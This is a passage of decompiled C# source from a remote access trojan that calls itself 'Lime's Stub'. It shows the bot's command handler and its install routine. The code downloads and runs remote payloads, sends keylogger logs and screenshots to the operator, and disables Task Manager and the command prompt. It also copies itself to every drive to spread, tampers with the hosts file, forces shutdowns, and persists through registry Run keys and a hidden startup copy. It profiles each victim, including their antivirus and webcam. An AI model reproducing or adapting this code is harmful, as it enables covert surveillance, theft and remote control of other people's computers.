    if (Operators.CompareString(text, "ShowBar", false) == 0)
    {
     string text4 = "Shell_traywnd";
     string text5 = "";
     int hwnd2 = OK.FindWindow(ref text4, ref text5);
     OK.SetWindowPos(hwnd2, 0, 0, 0, 0, 0, 64);
    }
    break;
   case 2054338866u:
    if (Operators.CompareString(text, "HideBar", false) == 0)
    {
     string text2 = "Shell_traywnd";
     string text3 = "";
     int hwnd = OK.FindWindow(ref text2, ref text3);
     OK.SetWindowPos(hwnd, 0, 0, 0, 0, 0, 128);
    }
    break;
   case 2317804999u:
    if (Operators.CompareString(text, "taskmgrOFF", false) == 0)
    {
     object current = WindowsIdentity.GetCurrent();
     object instance = new WindowsPrincipal((WindowsIdentity)current);
     if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance, null, "IsInRole", new object[1]
     {
      WindowsBuiltInRole.Administrator
     }, null, null, null)))
     {
      OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
     }
     else
     {
      MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
     }
    }
    break;
   case 718925475u:
    if (Operators.CompareString(text, "taskmgrON", false) == 0)
    {
     object current3 = WindowsIdentity.GetCurrent();
     object instance3 = new WindowsPrincipal((WindowsIdentity)current3);
     if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance3, null, "IsInRole", new object[1]
     {
      WindowsBuiltInRole.Administrator
     }, null, null, null)))
     {
      OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
     }
     else
     {
      MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "0", RegistryValueKind.DWord);
     }
    }
    break;
   case 3213366942u:
    if (Operators.CompareString(text, "EnableCMD", false) == 0)
    {
     object current2 = WindowsIdentity.GetCurrent();
     object instance2 = new WindowsPrincipal((WindowsIdentity)current2);
     if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance2, null, "IsInRole", new object[1]
     {
      WindowsBuiltInRole.Administrator
     }, null, null, null)))
     {
      OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
     }
     else
     {
      MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "0", RegistryValueKind.DWord);
     }
    }
    break;
   case 1700680649u:
    if (Operators.CompareString(text, "DisableCMD", false) == 0)
    {
     object current6 = WindowsIdentity.GetCurrent();
     object instance6 = new WindowsPrincipal((WindowsIdentity)current6);
     if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance6, null, "IsInRole", new object[1]
     {
      WindowsBuiltInRole.Administrator
     }, null, null, null)))
     {
      OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
     }
     else
     {
      MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "1", RegistryValueKind.DWord);
     }
    }
    break;
   case 3108627940u:
    if (Operators.CompareString(text, "MonitorON", false) == 0)
    {
     OK.SendMessage(-1, 274u, 61808u, -1);
    }
    break;
   case 557886142u:
    if (Operators.CompareString(text, "MonitorOFF", false) == 0)
    {
     OK.SendMessage(-1, 274u, 61808u, 2);
    }
    break;
   case 860096209u:
    if (Operators.CompareString(text, "NormalMouse", false) == 0)
    {
     OK.SwapMouseButton(0L);
    }
    break;
   case 2922144132u:
    if (Operators.CompareString(text, "ReverseMouse", false) == 0)
    {
     OK.SwapMouseButton(256L);
    }
    break;
   case 2576659495u:
    if (Operators.CompareString(text, "ClearClp", false) == 0)
    {
     Thread thread2 = new Thread(Clipboard.Clear);
     thread2.SetApartmentState(ApartmentState.STA);
     thread2.Start();
    }
    break;
   case 3553460540u:
    if (Operators.CompareString(text, "SetClp", false) == 0)
    {
     Thread thread = new Thread((_Closure$__.$IR26-1 == null) ? (_Closure$__.$IR26-1 = delegate(object a0)
     {
      Clipboard.SetText(Conversions.ToString(a0));
     }) : _Closure$__.$IR26-1);
     thread.SetApartmentState(ApartmentState.STA);
     thread.Start(array[1]);
    }
    break;
   case 601276870u:
    if (Operators.CompareString(text, "OpenWebpageHidden", false) == 0)
    {
     ProcessStartInfo processStartInfo = new ProcessStartInfo();
     processStartInfo.FileName = "iexplore.exe";
     processStartInfo.Arguments = array[1];
     processStartInfo.CreateNoWindow = true;
     processStartInfo.ErrorDialog = false;
     processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
     Process.Start(processStartInfo);
    }
    break;
   case 3642407086u:
    if (Operators.CompareString(text, "OpenWebpage", false) == 0)
    {
     Process.Start(array[1]);
    }
    break;
   case 4269631087u:
    if (Operators.CompareString(text, "BlockWebpage", false) == 0)
    {
     object current5 = WindowsIdentity.GetCurrent();
     object instance5 = new WindowsPrincipal((WindowsIdentity)current5);
     if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance5, null, "IsInRole", new object[1]
     {
      WindowsBuiltInRole.Administrator
     }, null, null, null)))
     {
      OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
     }
     else
     {
      MyProject.Computer.FileSystem.WriteAllText("C:\\WINDOWS\\system32\\drivers\\etc\\hosts", "\r\n127.0.0.1  " + array[1], true);
     }
    }
    break;
   case 989868607u:
    if (Operators.CompareString(text, "msgbox", false) == 0)
    {
     Interaction.MsgBox(array[1], MsgBoxStyle.Information, "Information");
    }
    break;
   case 4171019001u:
    if (Operators.CompareString(text, "antiproc", false) == 0)
    {
     MyAntiProcess.AutoAnti();
     MyAntiProcess.Start();
    }
    break;
   case 2513567945u:
    if (Operators.CompareString(text, "antiprocstop", false) == 0)
    {
     MyAntiProcess.stopme();
     MyAntiProcess.XAnti();
    }
    break;
   case 2648296626u:
    if (Operators.CompareString(text, "spreadusbme", false) == 0)
    {
     try
     {
      string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
      string[] logicalDrives = Directory.GetLogicalDrives();
      string[] array9 = logicalDrives;
      foreach (string programFiles in array9)
      {
       try
       {
        if (!File.Exists(programFiles + OK.RG))
        {
         File.Copy(Assembly.GetExecutingAssembly().Location, programFiles + OK.RG);
        }
       }
       catch (Exception projectError)
       {
        ProjectData.SetProjectError(projectError);
        ProjectData.ClearProjectError();
       }
      }
     }
     catch (Exception projectError2)
     {
      ProjectData.SetProjectError(projectError2);
      ProjectData.ClearProjectError();
     }
    }
    break;
   case 2052932546u:
    if (Operators.CompareString(text, "restartme", false) == 0)
    {
     Interaction.Shell("shutdown -r -t 00 -f", AppWinStyle.Hide, false, -1);
    }
    break;
   case 2502785813u:
    if (Operators.CompareString(text, "shutdownme", false) == 0)
    {
     Interaction.Shell("shutdown -s -t 00 -f", AppWinStyle.Hide, false, -1);
    }
    break;
   case 3917606159u:
    if (Operators.CompareString(text, "botk", false) == 0)
    {
     BotKillers.RunStandardBotKiller();
     OK.Send("MSG" + OK.Y + "Ran Malware Killer");
    }
    break;
   case 547083341u:
    if (Operators.CompareString(text, "TextToSpeech", false) == 0)
    {
     object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Interaction.CreateObject("SAPI.Spvoice", "")));
     object objectValue2 = RuntimeHelpers.GetObjectValue(objectValue);
     Type type = null;
     string memberName = "speak";
     object[] array3 = new object[1];
     object[] array4 = array3;
     int num = 0;
     string[] array5 = array;
     string[] array6 = array5;
     int num2 = 1;
     array4[num] = array6[num2];
     object[] array7 = array3;
     object[] arguments = array7;
     string[] argumentNames = null;
     Type[] typeArguments = null;
     bool[] array8 = new bool[1]
     {
      true
     };
     NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(objectValue2), type, memberName, arguments, argumentNames, typeArguments, array8, true);
     if (array8[0])
     {
      array5[num2] = Conversions.ToString(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(array7[0])), typeof(string)));
     }
    }
    break;
   case 1160889637u:
    if (Operators.CompareString(text, "ll", false) == 0)
    {
     OK.Cn = false;
     return;
    }
    break;
   case 1128069874u:
    if (Operators.CompareString(text, "kl", false) == 0)
    {
     OK.Send("kl" + OK.Y + OK.ENB(ref OK.kq.Logs));
     return;
    }
    break;
   case 4013831322u:
    if (Operators.CompareString(text, "prof", false) == 0)
    {
     string left = array[1];
     if (Operators.CompareString(left, "~", false) != 0)
     {
      if (Operators.CompareString(left, "!", false) != 0)
      {
       if (Operators.CompareString(left, "@", false) == 0)
       {
        OK.DLV(array[2]);
       }
      }
      else
      {
       OK.STV(array[2], array[3], RegistryValueKind.String);
       OK.Send(Conversions.ToString(RuntimeHelpers.GetObjectValue(Operators.ConcatenateObject("getvalue" + OK.Y + array[1] + OK.Y, RuntimeHelpers.GetObjectValue(OK.GTV(array[1], ""))))));
      }
     }
     else
     {
      OK.STV(array[2], array[3], RegistryValueKind.String);
     }
     return;
    }
    break;
   }
   checked
   {
    if (Operators.CompareString(text, "rn", false) == 0)
    {
     byte[] bytes;
     if (array[2][0] == '\u001f')
     {
      try
      {
       MemoryStream memoryStream = new MemoryStream();
       int length = (array[0] + OK.Y + array[1] + OK.Y).Length;
       memoryStream.Write(b, length, b.Length - length);
       bytes = OK.ZIP(memoryStream.ToArray());
      }
      catch (Exception ex3)
      {
       ProjectData.SetProjectError(ex3);
       Exception ex4 = ex3;
       ProjectData.SetProjectError(ex4);
       Exception ex5 = ex4;
       OK.Send("MSG" + OK.Y + "Execute ERROR");
       OK.Send("bla");
       ProjectData.ClearProjectError();
       ProjectData.ClearProjectError();
       return;
      }
     }
     else
     {
      WebClient webClient = new WebClient();
      try
      {
       bytes = webClient.DownloadData(array[2]);
      }
      catch (Exception ex6)
      {
       ProjectData.SetProjectError(ex6);
       Exception ex7 = ex6;
       ProjectData.SetProjectError(ex7);
       Exception ex8 = ex7;
       OK.Send("MSG" + OK.Y + "Download ERROR");
       OK.Send("bla");
       ProjectData.ClearProjectError();
       ProjectData.ClearProjectError();
       return;
      }
     }
     OK.Send("bla");
     string text6 = Path.GetTempFileName() + "." + array[1];
     try
     {
      File.WriteAllBytes(text6, bytes);
      Process.Start(text6);
      OK.Send("MSG" + OK.Y + "Executed As " + new FileInfo(text6).Name);
     }
     catch (Exception ex9)
     {
      ProjectData.SetProjectError(ex9);
      Exception ex10 = ex9;
      ProjectData.SetProjectError(ex10);
      Exception ex11 = ex10;
      OK.Send("MSG" + OK.Y + "Execute ERROR " + ex11.Message);
      ProjectData.ClearProjectError();
      ProjectData.ClearProjectError();
     }
    }
    else if (Operators.CompareString(text, "inv", false) != 0)
    {
     string text8;
     if (Operators.CompareString(text, "ret", false) != 0)
     {
      if (Operators.CompareString(text, "CAP", false) != 0)
      {
       if (Operators.CompareString(text, "un", false) == 0)
       {
        string left2 = array[1];
        if (Operators.CompareString(left2, "~", false) != 0)
        {
         if (Operators.CompareString(left2, "!", false) != 0)
         {
          if (Operators.CompareString(left2, "@", false) == 0)
          {
           OK.pr(0);
           Process.Start(OK.LO.FullName);
           ProjectData.EndApp();
          }
         }
         else
         {
          OK.pr(0);
          ProjectData.EndApp();
         }
        }
        else
        {
         OK.UNS();
        }
       }
       else if (Operators.CompareString(text, "up", false) == 0)
       {
        byte[] array10 = null;
        if (array[1][0] == '\u001f')
        {
         try
         {
          MemoryStream memoryStream2 = new MemoryStream();
          int length2 = (array[0] + OK.Y).Length;
          memoryStream2.Write(b, length2, b.Length - length2);
          array10 = OK.ZIP(memoryStream2.ToArray());
         }
         catch (Exception ex12)
         {
          ProjectData.SetProjectError(ex12);
          Exception ex13 = ex12;
          ProjectData.SetProjectError(ex13);
          Exception ex14 = ex13;
          OK.Send("MSG" + OK.Y + "Update ERROR");
          OK.Send("bla");
          ProjectData.ClearProjectError();
          ProjectData.ClearProjectError();
          return;
         }
        }
        else
        {
         WebClient webClient2 = new WebClient();
         try
         {
          array10 = webClient2.DownloadData(array[1]);
         }
         catch (Exception ex15)
         {
          ProjectData.SetProjectError(ex15);
          Exception ex16 = ex15;
          ProjectData.SetProjectError(ex16);
          Exception ex17 = ex16;
          OK.Send("MSG" + OK.Y + "Update ERROR");
          OK.Send("bla");
          ProjectData.ClearProjectError();
          ProjectData.ClearProjectError();
          return;
         }
        }
        OK.Send("bla");
        string text7 = Path.GetTempFileName() + ".exe";
        try
        {
         OK.Send("MSG" + OK.Y + "Updating To " + new FileInfo(text7).Name);
         Thread.Sleep(2000);
         File.WriteAllBytes(text7, array10);
         Process.Start(text7, "..");
        }
        catch (Exception ex18)
        {
         ProjectData.SetProjectError(ex18);
         Exception ex19 = ex18;
         ProjectData.SetProjectError(ex19);
         Exception ex20 = ex19;
         OK.Send("MSG" + OK.Y + "Update ERROR " + ex20.Message);
         ProjectData.ClearProjectError();
         ProjectData.ClearProjectError();
         return;
        }
        OK.UNS();
       }
       else
       {
        if (Operators.CompareString(text, "Ex", false) == 0)
        {
         if (OK.PLG == null)
         {
          OK.Send("PLG");
          int num3 = 0;
          while (!(OK.PLG != null | num3 == 20 | !OK.Cn))
          {
           num3++;
           Thread.Sleep(1000);
          }
          if (!(OK.PLG == null | !OK.Cn))
          {
           goto IL_18fd;
          }
          goto end_IL_0015;
         }
         goto IL_18fd;
        }
        if (Operators.CompareString(text, "PLG", false) == 0)
        {
         MemoryStream memoryStream3 = new MemoryStream();
         int length3 = (array[0] + OK.Y).Length;
         memoryStream3.Write(b, length3, b.Length - length3);
         OK.PLG = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(OK.ZIP(memoryStream3.ToArray()), "A")));
         NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "H", new object[1]
         {
          OK.H
         }, null, null);
         NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "P", new object[1]
         {
          OK.P
         }, null, null);
         NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "c", new object[1]
         {
          OK.C
         }, null, null);
        }
       }
      }
      else
      {
       Rectangle targetRect = Screen.PrimaryScreen.Bounds;
       Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, targetRect.Height, PixelFormat.Format16bppRgb555);
       Graphics graphics = Graphics.FromImage(bitmap);
       Size blockRegionSize = new Size(bitmap.Width, bitmap.Height);
       graphics.CopyFromScreen(0, 0, 0, 0, blockRegionSize, CopyPixelOperation.SourceCopy);
       try
       {
        blockRegionSize = new Size(32, 32);
        targetRect = new Rectangle(Cursor.Position, blockRegionSize);
        Cursors.Default.Draw(graphics, targetRect);
       }
       catch (Exception ex21)
       {
        ProjectData.SetProjectError(ex21);
        Exception ex22 = ex21;
        ProjectData.SetProjectError(ex22);
        Exception ex23 = ex22;
        ProjectData.ClearProjectError();
        ProjectData.ClearProjectError();
       }
       graphics.Dispose();
       Bitmap bitmap2 = new Bitmap(Conversions.ToInteger(array[1]), Conversions.ToInteger(array[2]));
       graphics = Graphics.FromImage(bitmap2);
       graphics.DrawImage(bitmap, 0, 0, bitmap2.Width, bitmap2.Height);
       graphics.Dispose();
       MemoryStream memoryStream4 = new MemoryStream();
       text8 = "CAP" + OK.Y;
       b = OK.SB(ref text8);
       memoryStream4.Write(b, 0, b.Length);
       MemoryStream memoryStream5 = new MemoryStream();
       bitmap2.Save(memoryStream5, ImageFormat.Jpeg);
       string left3 = OK.md5(memoryStream5.ToArray());
       if (Operators.CompareString(left3, OK.lastcap, false) != 0)
       {
        OK.lastcap = left3;
        memoryStream4.Write(memoryStream5.ToArray(), 0, (int)memoryStream5.Length);
       }
       else
       {
        memoryStream4.WriteByte(0);
       }
       OK.Sendb(memoryStream4.ToArray());
       memoryStream4.Dispose();
       memoryStream5.Dispose();
       bitmap.Dispose();
       bitmap2.Dispose();
      }
     }
     else
     {
      byte[] array11 = unchecked((byte[])OK.GTV(array[1], new byte[0]));
      if (array[2].Length < 10 & array11.Length == 0)
      {
       OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(1));
      }
      else
      {
       if (array[2].Length > 10)
       {
        MemoryStream memoryStream6 = new MemoryStream();
        int length4 = (array[0] + OK.Y + array[1] + OK.Y).Length;
        memoryStream6.Write(b, length4, b.Length - length4);
        array11 = OK.ZIP(memoryStream6.ToArray());
        OK.STV(array[1], array11, RegistryValueKind.Binary);
       }
       OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(0));
       object objectValue3 = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(array11, "A")));
       string[] obj = new string[5]
       {
        "ret",
        OK.Y,
        array[1],
        OK.Y,
        null
       };
       text8 = Conversions.ToString(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue3), null, "GT", new object[0], null, null, null)));
       obj[4] = OK.ENB(ref text8);
       OK.Send(string.Concat(obj));
      }
     }
    }
    else
    {
     byte[] array12 = unchecked((byte[])OK.GTV(array[1], new byte[0]));
     if (array[3].Length < 10 & array12.Length == 0)
     {
      OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(1));
     }
     else
     {
      if (array[3].Length > 10)
      {
       MemoryStream memoryStream7 = new MemoryStream();
       int length5 = (array[0] + OK.Y + array[1] + OK.Y + array[2] + OK.Y).Length;
       memoryStream7.Write(b, length5, b.Length - length5);
       array12 = OK.ZIP(memoryStream7.ToArray());
       OK.STV(array[1], array12, RegistryValueKind.Binary);
      }
      OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(0));
      object objectValue4 = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(array12, "A")));
      NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "h", new object[1]
      {
       OK.H
      }, null, null);
      NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "p", new object[1]
      {
       OK.P
      }, null, null);
      NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "osk", new object[1]
      {
       array[2]
      }, null, null);
      NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(objectValue4), null, "start", new object[0], null, null, null, true);
      while (!Conversions.ToBoolean(RuntimeHelpers.GetObjectValue(Operators.OrObject(!OK.Cn, RuntimeHelpers.GetObjectValue(Operators.CompareObjectEqual(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue4), null, "Off", new object[0], null, null, null)), true, false))))))
      {
       Thread.Sleep(1);
      }
      NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "off", new object[1]
      {
       true
      }, null, null);
     }
    }
    goto end_IL_0015;
   }
   IL_18fd:
   object[] array13 = new object[1]
   {
    b
   };
   bool[] array14 = new bool[1]
   {
    true
   };
   NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(OK.PLG), null, "ind", array13, null, null, array14, true);
   if (array14[0])
   {
    b = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(array13[0])), typeof(byte[]));
   }
   end_IL_0015:;
  }
  catch (Exception ex24)
  {
   ProjectData.SetProjectError(ex24);
   Exception ex25 = ex24;
   ProjectData.SetProjectError(ex25);
   Exception ex26 = ex25;
   if (array.Length > 0 && (Operators.CompareString(array[0], "Ex", false) == 0 | Operators.CompareString(array[0], "PLG", false) == 0))
   {
    OK.PLG = null;
   }
   try
   {
    OK.Send("ER" + OK.Y + array[0] + OK.Y + ex26.Message);
   }
   catch (Exception ex27)
   {
    ProjectData.SetProjectError(ex27);
    Exception ex28 = ex27;
    ProjectData.SetProjectError(ex28);
    Exception ex29 = ex28;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
 }

 public static string inf()
 {
  string text = "ll" + OK.Y;
  string text2;
  try
  {
   if (Operators.ConditionalCompareObjectEqual(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")), "", false))
   {
    string str = text;
    text2 = OK.DEB(ref OK.VN) + "_" + OK.HWD();
    text = str + OK.ENB(ref text2) + OK.Y;
   }
   else
   {
    string str2 = text;
    string text3 = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")));
    text2 = OK.DEB(ref text3) + "_" + OK.HWD();
    text = str2 + OK.ENB(ref text2) + OK.Y;
   }
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   string str3 = text;
   text2 = OK.HWD();
   text = str3 + OK.ENB(ref text2) + OK.Y;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  try
  {
   text = text + Environment.MachineName + OK.Y;
  }
  catch (Exception ex4)
  {
   ProjectData.SetProjectError(ex4);
   Exception ex5 = ex4;
   ProjectData.SetProjectError(ex5);
   Exception ex6 = ex5;
   text = text + "??" + OK.Y;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  try
  {
   text = text + Environment.UserName + OK.Y;
  }
  catch (Exception ex7)
  {
   ProjectData.SetProjectError(ex7);
   Exception ex8 = ex7;
   ProjectData.SetProjectError(ex8);
   Exception ex9 = ex8;
   text = text + "??" + OK.Y;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  try
  {
   string str4 = text;
   DateTime dateTime = OK.LO.LastWriteTime;
   dateTime = dateTime.Date;
   text = str4 + dateTime.ToString("yy-MM-dd") + OK.Y;
  }
  catch (Exception ex10)
  {
   ProjectData.SetProjectError(ex10);
   Exception ex11 = ex10;
   ProjectData.SetProjectError(ex11);
   Exception ex12 = ex11;
   text = text + "??-??-??" + OK.Y;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  text += OK.Y;
  try
  {
   text += OK.F.Info.OSFullName.Replace("Microsoft", "").Replace("Windows", "Win").Replace("®", "")
    .Replace("™", "")
    .Replace("  ", " ")
    .Replace(" Win", "Win");
  }
  catch (Exception ex13)
  {
   ProjectData.SetProjectError(ex13);
   Exception ex14 = ex13;
   ProjectData.SetProjectError(ex14);
   Exception ex15 = ex14;
   text += "??";
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  text += "SP";
  try
  {
   string[] array = Strings.Split(Environment.OSVersion.ServicePack, " ", -1, CompareMethod.Binary);
   if (array.Length == 1)
   {
    text += "0";
   }
   text += array[checked(array.Length - 1)];
  }
  catch (Exception ex16)
  {
   ProjectData.SetProjectError(ex16);
   Exception ex17 = ex16;
   ProjectData.SetProjectError(ex17);
   Exception ex18 = ex17;
   text += "0";
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  try
  {
   text = ((!Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Contains("x86")) ? (text + " x86" + OK.Y) : (text + " x64" + OK.Y));
  }
  catch (Exception ex19)
  {
   ProjectData.SetProjectError(ex19);
   Exception ex20 = ex19;
   ProjectData.SetProjectError(ex20);
   Exception ex21 = ex20;
   text += OK.Y;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  text = ((!OK.Cam()) ? (text + "No" + OK.Y) : (text + "Yes" + OK.Y));
  text = text + OK.GetAntiVirus() + OK.Y + OK.GetAntiVirus() + OK.Y + OK.GetAntiVirus() + OK.Y;
  string text4 = "";
  try
  {
   string[] valueNames = OK.F.Registry.CurrentUser.CreateSubKey("Software\\" + OK.RG, RegistryKeyPermissionCheck.Default).GetValueNames();
   foreach (string text5 in valueNames)
   {
    if (text5.Length == 32)
    {
     text4 = text4 + text5 + ",";
    }
   }
  }
  catch (Exception ex22)
  {
   ProjectData.SetProjectError(ex22);
   Exception ex23 = ex22;
   ProjectData.SetProjectError(ex23);
   Exception ex24 = ex23;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return text + text4;
 }

 [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
 public static void INS()
 {
  Thread.Sleep(1000);
  if (OK.Idr && !OK.CompDir(OK.LO, new FileInfo(Interaction.Environ(OK.DR).ToLower() + "\\" + OK.EXE.ToLower())))
  {
   try
   {
    if (File.Exists(Interaction.Environ(OK.DR) + "\\" + OK.EXE))
    {
     File.Delete(Interaction.Environ(OK.DR) + "\\" + OK.EXE);
    }
    FileStream fileStream = new FileStream(Interaction.Environ(OK.DR) + "\\" + OK.EXE, FileMode.CreateNew);
    byte[] array = File.ReadAllBytes(OK.LO.FullName);
    fileStream.Write(array, 0, array.Length);
    fileStream.Flush();
    fileStream.Close();
    OK.LO = new FileInfo(Interaction.Environ(OK.DR) + "\\" + OK.EXE);
    Process.Start(OK.LO.FullName);
    ProjectData.EndApp();
   }
   catch (Exception ex)
   {
    ProjectData.SetProjectError(ex);
    Exception ex2 = ex;
    ProjectData.SetProjectError(ex2);
    Exception ex3 = ex2;
    ProjectData.EndApp();
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
  }
  try
  {
   Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User);
  }
  catch (Exception ex4)
  {
   ProjectData.SetProjectError(ex4);
   Exception ex5 = ex4;
   ProjectData.SetProjectError(ex5);
   Exception ex6 = ex5;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  if (OK.Isu)
  {
   try
   {
    OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
   }
   catch (Exception ex7)
   {
    ProjectData.SetProjectError(ex7);
    Exception ex8 = ex7;
    ProjectData.SetProjectError(ex8);
    Exception ex9 = ex8;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
   try
   {
    OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
   }
   catch (Exception ex10)
   {
    ProjectData.SetProjectError(ex10);
    Exception ex11 = ex10;
    ProjectData.SetProjectError(ex11);
    Exception ex12 = ex11;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
  }
  if (OK.IsF)
  {
   try
   {
    if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG))
    {
     File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
    }
    File.Copy(OK.LO.FullName, Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG, true);
    string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
    string str = fileNameWithoutExtension;
    if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + str + ".url"))
    {
     File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + str + ".url");
    }
    string text = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG;
    string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
    object obj = new StreamWriter(folderPath + "\\" + str + ".url");
    try
    {
     File.SetAttributes(text, FileAttributes.Hidden);
     NewLateBinding.LateCall(obj, null, "WriteLine", new object[1]
     {
      "[InternetShortcut]"
     }, null, null, null, true);
     NewLateBinding.LateCall(obj, null, "WriteLine", new object[1]
     {
      "URL=file:///" + text
     }, null, null, null, true);
     NewLateBinding.LateCall(obj, null, "WriteLine", new object[1]
     {
      "IconIndex=17"
     }, null, null, null, true);
     NewLateBinding.LateCall(obj, null, "WriteLine", new object[1]
     {
      "IconFile=C:\\Windows\\system32\\SHELL32.dll"
     }, null, null, null, true);
     NewLateBinding.LateCall(obj, null, "Flush", new object[0], null, null, null, true);
    }
    finally
    {
     if (obj != null)
     {
      ((IDisposable)obj).Dispose();
     }
    }
    if (Conversions.ToBoolean(OK.HIDE_ME))
    {
     File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
    }
   }
   catch (Exception ex13)
   {
    ProjectData.SetProjectError(ex13);
    Exception ex14 = ex13;
    ProjectData.SetProjectError(ex14);
    Exception ex15 = ex14;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
  }
 }

 [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
 public static void ko()
 {
  checked
  {
   Thread.Sleep((int)Math.Round(Math.Round(Math.Round(unchecked(Conversions.ToDouble(OK.SLP) * 1000.0)))));
   if (OK.Anti_CH)
   {
    try
    {
     MyAntiProcess.Start();
    }
    catch (Exception projectError)
    {
     ProjectData.SetProjectError(projectError);
     ProjectData.ClearProjectError();
    }
   }
   if (OK.BOT_KILL)
   {
    try
    {
     BotKillers.RunStandardBotKiller();
     Thread.Sleep(50);
    }
    catch (Exception projectError2)
    {
     ProjectData.SetProjectError(projectError2);
     ProjectData.ClearProjectError();
    }
   }
   if (OK.USB_SP)
   {
    try
    {
     string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
     string[] logicalDrives = Directory.GetLogicalDrives();
     string[] array = logicalDrives;
     foreach (string programFiles in array)
     {
      try
      {
       if (!File.Exists(programFiles + OK.RG))
       {
        File.Copy(Assembly.GetExecutingAssembly().Location, programFiles + OK.RG);
       }
      }
      catch (Exception projectError3)
      {
       ProjectData.SetProjectError(projectError3);
       ProjectData.ClearProjectError();
      }
     }
    }
    catch (Exception projectError4)
    {
     ProjectData.SetProjectError(projectError4);
     ProjectData.ClearProjectError();
    }
   }
   if (OK.Persis)
   {
    try
    {
     object executablePath = Application.ExecutablePath;
